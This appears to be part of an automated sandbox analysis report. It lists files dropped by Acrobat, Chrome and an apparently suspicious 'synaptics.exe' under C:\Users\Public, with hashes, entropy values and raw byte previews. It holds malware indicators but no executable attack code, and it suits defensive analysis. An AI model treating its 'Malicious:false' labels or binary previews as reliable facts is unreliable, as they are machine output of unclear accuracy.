                                                                                                                                                                                      SSDEEP:12288:ONh3PhTJJJJv+9UZP5+Tegs6121YSWBlkipdjuv1ybxrr/IxkB1mabFhOXZ/fEas:O3PJJJJJm94kegf121YS8lkipdjMMNBn
                                                                                                                                                                                      MD5:0FD93E20C1612CF7CCA0771CD40D762F
                                                                                                                                                                                      SHA1:696E5156CF167B4CF06FF0D5DF3B5D46FABDBD77
                                                                                                                                                                                      SHA-256:9CA209D9F3FEF3163FA292A2523DFFB0CE40E2E1067F4E4502A3B9DC8263B56A
                                                                                                                                                                                      SHA-512:4CD9E26DE55F15209FD93F553965596986144C4B9A5301FFA8A067492DDB2E19DB2CE1B35F33BED0883705972151F058E6AAD5A143AD1BC0735D94B056BA6B58
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:...........kWT..0...W`.........b..@..nn........5.._..I.R3I..9g.x....s.\+.J......F...P......V]u......t....jK...C.fD..]..K....;......y._.U..}......S.........7...Q.............W.D..S.....y......%..=.....e..^.RG......L..].T.9.y.zqm.Q]..y..(......Q]..~~..}..q...@.T..xI.B.L.a.6...{..W..}.mK?u...5.#.{...n...........z....m^.6!.`.....u...eFa........N....o..hA-..s.N..B.q..{..z.{=..va4_`5Z........3.uG.n...+...t...z.M."2..x.-...DF..VtK.....o]b.Fp.>........c....,..t..an[............5.1.(}..q.q......K3.....[>..;e..f.Y.........mV.cL...]eF..7.e.<.._.o\.S..Z...`..}......>@......|.......ox.........h.......o....-Yj=.s.g.Cc\.i..\..A.B>.X..8`...P......[..O...-.g...r..u\...k..7..#E....N}...8.....(..0....w....j.......>.L....H.....y.x3...[>..t......0..z.qw..]X..i8..w.b..?0.wp..XH.A.[.....S..g.g..I.A.15.0?._n.Q.]..r8.....l..18...(.].m...!|G.1...... .3.`./....`~......G.............|..pS.e.C....:o.u_..oi.:..|....joi...eM.m.K...2%...Z..j...VUh..9.}.....
                                                                                                                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                                                                                                      File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 42290
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):1407294
                                                                                                                                                                                      Entropy (8bit):7.97605879016224
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:24576:/VRbdpy6mlind9j2kvhsfFXpAXDgrFBU2/R07tOWL07oXGZDYIGNPh:tRb3mlind9i4ufFXpAXkrfUs0kWLxXGG
                                                                                                                                                                                      MD5:C998C4F1A2DEE9583DB57F5F32441360
                                                                                                                                                                                      SHA1:C1FEE90093B29AD0F312B076E79B89295C87E851
                                                                                                                                                                                      SHA-256:14BC4AE964B9F204B23203BF9F5C2DEDD3096C68D650CB15963EBC9D6244EBAF
                                                                                                                                                                                      SHA-512:78219076A623936F7A5DB693603984694D589B8D97EC9FC10C2FF6CA1C293545274CEF5F3B763CB8AA029BB93774873760008C2972561D31C7C13442B2A4CB2D
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E|.P..$ni.{.....T.^~<m-..J....RQk..*..f.....q.......V.rC.M.b.DiL\.....wq.*...$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..D*T...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W*..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.......*..R.....j.WD).M..9.Fw...W.-a..z.l\..u*.^....*L..^.`.T...l.^.B.DMc.d....i...o.|M.uF|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,*.e....5...X.}6.P....y\.s|..Si..BB..y...~.....D^g...*7'T-.5*.!K.$\...2.
                                                                                                                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                                                                                                      File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1311022
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):386528
                                                                                                                                                                                      Entropy (8bit):7.9736851559892425
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:6144:8OSTJJJJEQ6T9UkRm1lBgI81ReWQ53+sQ36X/FLYVbxrr/IxktOQZ1mau4yBwsOo:sTJJJJv+9UZX+Tegs661ybxrr/IxkB1m
                                                                                                                                                                                      MD5:5C48B0AD2FEF800949466AE872E1F1E2
                                                                                                                                                                                      SHA1:337D617AE142815EDDACB48484628C1F16692A2F
                                                                                                                                                                                      SHA-256:F40E3C96D4ED2F7A299027B37B2C0C03EAEEE22CF79C6B300E5F23ACB1EB31FE
                                                                                                                                                                                      SHA-512:44210CE41F6365298BFBB14F6D850E59841FF555EBA00B51C6B024A12F458E91E43FDA3FA1A10AAC857D4BA7CA6992CCD891C02678DCA33FA1F409DE08859324
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:...........]s[G. Z...{....;...J$%K&..%.[..k...S....$,.`. )Z..m........a.......o..7.VfV...S..HY}Ba.<.NUVVV~W.].;qG4..b,N..#1.=1.#1..o.Fb.........IC.....Z...g_~.OO.l..g.uO...bY.,[..o.s.D<..W....w....?$4..+..%.[.?..h.w<.T.9.vM.!..h0......}..H..$[...lq,....>..K.)=..s.{.g.O...S9".....Q...#...+..)>=.....|6......<4W.'.U.j$....+..=9...l.....S..<.\.k.'....{.1<.?..<..uk.v;.7n.!...g....."P..4.U........c.KC..w._G..u..g./.g....{'^.-|..h#.g.\.PO.|...]x..Kf4..s..............+.Y.....@.K....zI..X......6e?[..u.g"{..h.vKbM<.?i6{%.q)i...v..<P8P3.......CW.fwd...{:@h...;........5..@.C.j.....a.. U.5...].$.L..wW....z...v.......".M.?c.......o..}.a.9..A..%V..o.d....'..|m.WC.....|.....e.[W.p.8...rm....^..x'......5!...|......z..#......X_..Gl..c..R..`...*.s-1f..]x......f...g...k........g....... ).3.B..{"4...!r....v+As...Zn.]K{.8[..M.r.Y..........+%...]...J}f]~}_..K....;.Z.[..V.&..g...>...{F..{I..@~.^.|P..G.R>....U..../HY...(.z.<.~.9OW.Sxo.Y
                                                                                                                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                                                                                                      File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 299538
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):758601
                                                                                                                                                                                      Entropy (8bit):7.98639316555857
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:12288:ONh3PhTJJJJv+9UZP5+Tegs6121YSWBlkipdjuv1ybxrr/IxkB1mabFhOXZ/fEas:O3PJJJJJm94kegf121YS8lkipdjMMNBn
                                                                                                                                                                                      MD5:0FD93E20C1612CF7CCA0771CD40D762F
                                                                                                                                                                                      SHA1:696E5156CF167B4CF06FF0D5DF3B5D46FABDBD77
                                                                                                                                                                                      SHA-256:9CA209D9F3FEF3163FA292A2523DFFB0CE40E2E1067F4E4502A3B9DC8263B56A
                                                                                                                                                                                      SHA-512:4CD9E26DE55F15209FD93F553965596986144C4B9A5301FFA8A067492DDB2E19DB2CE1B35F33BED0883705972151F058E6AAD5A143AD1BC0735D94B056BA6B58
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:...........kWT..0...W`.........b..@..nn........5.._..I.R3I..9g.x....s.\+.J......F...P......V]u......t....jK...C.fD..]..K....;......y._.U..}......S.........7...Q.............W.D..S.....y......%..=.....e..^.RG......L..].T.9.y.zqm.Q]..y..(......Q]..~~..}..q...@.T..xI.B.L.a.6...{..W..}.mK?u...5.#.{...n...........z....m^.6!.`.....u...eFa........N....o..hA-..s.N..B.q..{..z.{=..va4_`5Z........3.uG.n...+...t...z.M."2..x.-...DF..VtK.....o]b.Fp.>........c....,..t..an[............5.1.(}..q.q......K3.....[>..;e..f.Y.........mV.cL...]eF..7.e.<.._.o\.S..Z...`..}......>@......|.......ox.........h.......o....-Yj=.s.g.Cc\.i..\..A.B>.X..8`...P......[..O...-.g...r..u\...k..7..#E....N}...8.....(..0....w....j.......>.L....H.....y.x3...[>..t......0..z.qw..]X..i8..w.b..?0.wp..XH.A.[.....S..g.g..I.A.15.0?._n.Q.]..r8.....l..18...(.].m...!|G.1...... .3.`./....`~......G.............|..pS.e.C....:o.u_..oi.:..|....joi...eM.m.K...2%...Z..j...VUh..9.}.....
                                                                                                                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                                                                                                      File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 921996
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):386528
                                                                                                                                                                                      Entropy (8bit):7.9736851559892425
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:6144:rBgI81ReWQ53+sQ36X/FLYVbxrr/IxktOQZ1mau4yBwsOFjNOX1Lj3vfE4JvWTlP:r+Tegs661ybxrr/IxkB1mabFhOXZ/fEh
                                                                                                                                                                                      MD5:C14EBC9A03804BAB863F67F539F142C6
                                                                                                                                                                                      SHA1:FD44F63771819778149B24DD4B073940F5D95BFA
                                                                                                                                                                                      SHA-256:A495629FA5E71EE50BB96F9C4CAEAC46E8B44BFC3F910A073348258F63DFAFCE
                                                                                                                                                                                      SHA-512:8ED832A54A3925914E3BCFC96A3ABFF63A511ADAC79A869AD1569BB175CC1AF84E6C2BD20FA2187A5C3B733625EDE5D95C2172B24ED2F252835689F6D4A0F5A2
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:...........[l\[.......p.a$..$.K...&%J.J...Wuo..dI.vk4.E..P.u..(.....1.I....A...............0.....$ctg.H.'....@.Zk...~.s.A]M.A..:g?.^{...cjL...X..#.Q{......z...m...K.U]-..^V.........@..P...U.R..z.......?......]nG..O{..n........y...v7...~C#..O.z...:...H&..6M;........c..#.y4u.~6.?...V?.%?SW.....K...[..`N.i.1..:..@?i.Q..O...`.....m.!y.{...?=.. .....Zk......%.6......o<.....yA}......no......u,.....U...a.......[S.n..`.....:...1......X..u.u...`..B=.&M.y..s.....}.i..l.'u]. ...6.s`....zdN.F.>;.d%D..}3..b..~..k.......,hl.j..._...F..p.z..o...C..,.Ss.u.Xd..a.Y.{.p...?.k..t,&..'...........^.f.hg....y..Y...i..m....<..^......yK.......;.5...E...K..Q.;k..|;..B.{m..eS..>b..>...6...wmC.i.....wv..k..{..X...RB.P..?w......1l.H..{{.`g.P.8.Z..v_.G.....f.%+z.....p.P..u}.T.....~r]..W7..._..c.k.....@....y.K...uOSj........^....B..]..~{..;...c....r.J.m.S.}.....k....u*^...5./...{......3.I.p.t...V..........W-..|.K.N.....n.........Bl...#)..;..4.x.....'....A....x..
                                                                                                                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                                                                                                      File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1311022
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):386528
                                                                                                                                                                                      Entropy (8bit):7.9736851559892425
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:6144:8OSTJJJJEQ6T9UkRm1lBgI81ReWQ53+sQ36X/FLYVbxrr/IxktOQZ1mau4yBwsOo:sTJJJJv+9UZX+Tegs661ybxrr/IxkB1m
                                                                                                                                                                                      MD5:5C48B0AD2FEF800949466AE872E1F1E2
                                                                                                                                                                                      SHA1:337D617AE142815EDDACB48484628C1F16692A2F
                                                                                                                                                                                      SHA-256:F40E3C96D4ED2F7A299027B37B2C0C03EAEEE22CF79C6B300E5F23ACB1EB31FE
                                                                                                                                                                                      SHA-512:44210CE41F6365298BFBB14F6D850E59841FF555EBA00B51C6B024A12F458E91E43FDA3FA1A10AAC857D4BA7CA6992CCD891C02678DCA33FA1F409DE08859324
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:...........]s[G. Z...{....;...J$%K&..%.[..k...S....$,.`. )Z..m........a.......o..7.VfV...S..HY}Ba.<.NUVVV~W.].;qG4..b,N..#1.=1.#1..o.Fb.........IC.....Z...g_~.OO.l..g.uO...bY.,[..o.s.D<..W....w....?$4..+..%.[.?..h.w<.T.9.vM.!..h0......}..H..$[...lq,....>..K.)=..s.{.g.O...S9".....Q...#...+..)>=.....|6......<4W.'.U.j$....+..=9...l.....S..<.\.k.'....{.1<.?..<..uk.v;.7n.!...g....."P..4.U........c.KC..w._G..u..g./.g....{'^.-|..h#.g.\.PO.|...]x..Kf4..s..............+.Y.....@.K....zI..X......6e?[..u.g"{..h.vKbM<.?i6{%.q)i...v..<P8P3.......CW.fwd...{:@h...;........5..@.C.j.....a.. U.5...].$.L..wW....z...v.......".M.?c.......o..}.a.9..A..%V..o.d....'..|m.WC.....|.....e.[W.p.8...rm....^..x'......5!...|......z..#......X_..Gl..c..R..`...*.s-1f..]x......f...g...k........g....... ).3.B..{"4...!r....v+As...Zn.]K{.8[..M.r.Y..........+%...]...J}f]~}_..K....;.Z.[..V.&..g...>...{F..{I..@~.^.|P..G.R>....U..../HY...(.z.<.~.9OW.Sxo.Y
                                                                                                                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                                                                                                      File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 921996
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):386528
                                                                                                                                                                                      Entropy (8bit):7.9736851559892425
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:6144:rBgI81ReWQ53+sQ36X/FLYVbxrr/IxktOQZ1mau4yBwsOFjNOX1Lj3vfE4JvWTlP:r+Tegs661ybxrr/IxkB1mabFhOXZ/fEh
                                                                                                                                                                                      MD5:C14EBC9A03804BAB863F67F539F142C6
                                                                                                                                                                                      SHA1:FD44F63771819778149B24DD4B073940F5D95BFA
                                                                                                                                                                                      SHA-256:A495629FA5E71EE50BB96F9C4CAEAC46E8B44BFC3F910A073348258F63DFAFCE
                                                                                                                                                                                      SHA-512:8ED832A54A3925914E3BCFC96A3ABFF63A511ADAC79A869AD1569BB175CC1AF84E6C2BD20FA2187A5C3B733625EDE5D95C2172B24ED2F252835689F6D4A0F5A2
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:...........[l\[.......p.a$..$.K...&%J.J...Wuo..dI.vk4.E..P.u..(.....1.I....A...............0.....$ctg.H.'....@.Zk...~.s.A]M.A..:g?.^{...cjL...X..#.Q{......z...m...K.U]-..^V.........@..P...U.R..z.......?......]nG..O{..n........y...v7...~C#..O.z...:...H&..6M;........c..#.y4u.~6.?...V?.%?SW.....K...[..`N.i.1..:..@?i.Q..O...`.....m.!y.{...?=.. .....Zk......%.6......o<.....yA}......no......u,.....U...a.......[S.n..`.....:...1......X..u.u...`..B=.&M.y..s.....}.i..l.'u]. ...6.s`....zdN.F.>;.d%D..}3..b..~..k.......,hl.j..._...F..p.z..o...C..,.Ss.u.Xd..a.Y.{.p...?.k..t,&..'...........^.f.hg....y..Y...i..m....<..^......yK.......;.5...E...K..Q.;k..|;..B.{m..eS..>b..>...6...wmC.i.....wv..k..{..X...RB.P..?w......1l.H..{{.`g.P.8.Z..v_.G.....f.%+z.....p.P..u}.T.....~r]..W7..._..c.k.....@....y.K...uOSj........^....B..]..~{..;...c....r.J.m.S.}.....k....u*^...5./...{......3.I.p.t...V..........W-..|.K.N.....n.........Bl...#)..;..4.x.....'....A....x..
                                                                                                                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                                                                                                      File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 299538
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):758601
                                                                                                                                                                                      Entropy (8bit):7.98639316555857
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:12288:ONh3P65+Tegs6121YSWBlkipdjuv1ybxrr/IxkB1mabFhOXZ/fEa+vTJJJJv+9UI:O3Pjegf121YS8lkipdjMMNB1DofjgJJE
                                                                                                                                                                                      MD5:E0C414FA00EC54ABF493C4E1A12B78BA
                                                                                                                                                                                      SHA1:C34D20BB5FE6C68AE5F80225A8E15FECF3024EE2
                                                                                                                                                                                      SHA-256:35E5559C0AB1970EF75CC482FB9B2F72CAE090C102D918EDC744DDC385DC5104
                                                                                                                                                                                      SHA-512:BB42E63A264A83A0C8825DE784DFF56D49D6D76433CBC8E3D228AB267B12CE52FB4F0BD524955AE84FBE1D7185CB48EA0B6A0FCC3E9E93F4F227709B1E087EBF
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:...........kWT..0...W`.........b..@..nn........5.._..I.R3I..9g.x....s.\+.J......F...P......V]u......t....jK...C.fD..]..K....;......y._.U..}......S.........7...Q.............W.D..S.....y......%..=.....e..^.RG......L..].T.9.y.zqm.Q]..y..(......Q]..~~..}..q...@.T..xI.B.L.a.6...{..W..}.mK?u...5.#.{...n...........z....m^.6!.`.....u...eFa........N....o..hA-..s.N..B.q..{..z.{=..va4_`5Z........3.uG.n...+...t...z.M."2..x.-...DF..VtK.....o]b.Fp.>........c....,..t..an[............5.1.(}..q.q......K3.....[>..;e..f.Y.........mV.cL...]eF..7.e.<.._.o\.S..Z...`..}......>@......|.......ox.........h.......o....-Yj=.s.g.Cc\.i..\..A.B>.X..8`...P......[..O...-.g...r..u\...k..7..#E....N}...8.....(..0....w....j.......>.L....H.....y.x3...[>..t......0..z.qw..]X..i8..w.b..?0.wp..XH.A.[.....S..g.g..I.A.15.0?._n.Q.]..r8.....l..18...(.].m...!|G.1...... .3.`./....`~......G.............|..pS.e.C....:o.u_..oi.:..|....joi...eM.m.K...2%...Z..j...VUh..9.}.....
                                                                                                                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                                                                                                      File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 5111142
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):1419751
                                                                                                                                                                                      Entropy (8bit):7.976496077007677
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:24576:ZDA7owWLaGZDwYIGNPJodpy6mlind9j2kvhsfFXpAXDgrFBU2/R07D:lVwWLaGZDwZGk3mlind9i4ufFXpAXkru
                                                                                                                                                                                      MD5:FE1669C6A66EA60C977202606F8DA6DB
                                                                                                                                                                                      SHA1:054250FECC9293AF02C8D8E6910134CD74BC3A23
                                                                                                                                                                                      SHA-256:B9BFC61A0E9F6D2FBAD4A401CBB676B9A300ECDE2357F73BFB62505216477D54
                                                                                                                                                                                      SHA-512:50ABA4E1B7ECAA2EA52D0F241E632040DE04D47B1E28F1A6B564D8CDE6DB10A44DBA1D5D50DAB75D418A01C9263D3D5D789B94D1FE84041AFEF1C5A35D521921
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:...........]..8.}. .)."{g.-.}plw.A........,..Y.tI.g.....)Q.H..'p#p`.U.S.H.)....e....a.><..w.....Dw..9.0Y~.......1.._......j.....Oh.q.\,....tn.....w..i.f..?A../.h.D..........n^......M..w......C....!..4.........w4q..F.1I.!A....(.........TN..'8...Q.........^...za..0Hm/.....{.....\....' ..1..0.qzD........'Y...... .m..8Bh... ...4...z..}.9..Lqp..M \Xe......Q..0..+C.B.4Ijm...o..co..q.d.~.8...\/.4.]....8...1.].D....K.|...hp\..... .ch.....\.g..Qpf.{N....n<......'.....KS(.k..$Q.R...6..'.....7.!....{.....b....C.v~...x...FO^..O.d.>'>...........&.. ..WR...6...^.D..A...d1|..F.g..g;.\...m..V..0..le.......4J..p.(..l'.....n_........n.0..P...Y.KJ.S.B.><.\C.}..~....,..k..V....XI#w..B..Q.B...t..\.lB;&!.n.(._=..>...+..a.......N.X{.{..ly.$V......@..E.....R.j.x[..V.....Ij.....mQ....-D....U1..J...F+.%...6.g.T.....X....(...w...8a..\1..^z.6...@R....l.i.A..,.......o..~^bM.E..qW^?.......!..)u.(&*.v....."c.H..Pp..uy...DP8.m3.:T..U=............0-~.B..w...D..'
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):196608
                                                                                                                                                                                      Entropy (8bit):1.1216922126537057
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:192:72qAdB9TbTbuDDsnxCkvSAE+WslKOMq+8MaQpY54tZ7YTrMD:72qOB1nxCkvSAELyKOMq+8mKQ0M
                                                                                                                                                                                      MD5:7F784E8E9051D8E70834C231AE5CC670
                                                                                                                                                                                      SHA1:FA92DDE2E8DD8599EA458CC8488123CB60AD0DC1
                                                                                                                                                                                      SHA-256:1CEE1D9084D2C05B68B40073E4E6FE380128B61988409D60A9F5CBFD7AE964F6
                                                                                                                                                                                      SHA-512:A054A1E0F3289F4CCD25F01A81C0B3471A2CA8243E76ADD24D105A4141FBC534D20CE913A796474FB17754AB3B87C56679B8962FB860060B23F467601043EEA7
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):196608
                                                                                                                                                                                      Entropy (8bit):1.1216922126537057
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:192:72qAdB9TbTbuDDsnxCkvSAE+WslKOMq+8MaQpY54tZ7YTrMD:72qOB1nxCkvSAELyKOMq+8mKQ0M
                                                                                                                                                                                      MD5:7F784E8E9051D8E70834C231AE5CC670
                                                                                                                                                                                      SHA1:FA92DDE2E8DD8599EA458CC8488123CB60AD0DC1
                                                                                                                                                                                      SHA-256:1CEE1D9084D2C05B68B40073E4E6FE380128B61988409D60A9F5CBFD7AE964F6
                                                                                                                                                                                      SHA-512:A054A1E0F3289F4CCD25F01A81C0B3471A2CA8243E76ADD24D105A4141FBC534D20CE913A796474FB17754AB3B87C56679B8962FB860060B23F467601043EEA7
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):20480
                                                                                                                                                                                      Entropy (8bit):0.6732424250451717
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                                                                                                                                                      MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                                                                                                                                                      SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                                                                                                                                                      SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                                                                                                                                                      SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):51200
                                                                                                                                                                                      Entropy (8bit):0.8746135976761988
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                                                                                                                                                      MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                                                                                                                                                      SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                                                                                                                                                      SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                                                                                                                                                      SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Nov 12 13:05:54 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):2673
                                                                                                                                                                                      Entropy (8bit):3.975726766194388
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:48:8idkTI4sHMidAKZdA1FehwiZUklqehAy+3:8ZPX/y
                                                                                                                                                                                      MD5:65972DE97057EFC2ABF848D6D983103F
                                                                                                                                                                                      SHA1:55C569C5EBEC7DC7813D90DE3AA179E7A2D36FFC
                                                                                                                                                                                      SHA-256:ABA7ADDE6FF20D0120481F318914F784666E3CED9AD439B884A84F7AA3B15840
                                                                                                                                                                                      SHA-512:A1B9C77B47B9CF3812B1072F665A3E77B8C27F9BF7D762ED1BD77CEF8A40F16D162EC0C68768806E5162167ECE92E626AAED955EDC53B22549B4F01CA0D36BEE
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:L..................F.@.. ...$+.,......\..5..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.IlY.p....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VlY.p....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VlY.p....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VlY.p..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VlY.p...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............x......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Nov 12 13:05:54 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
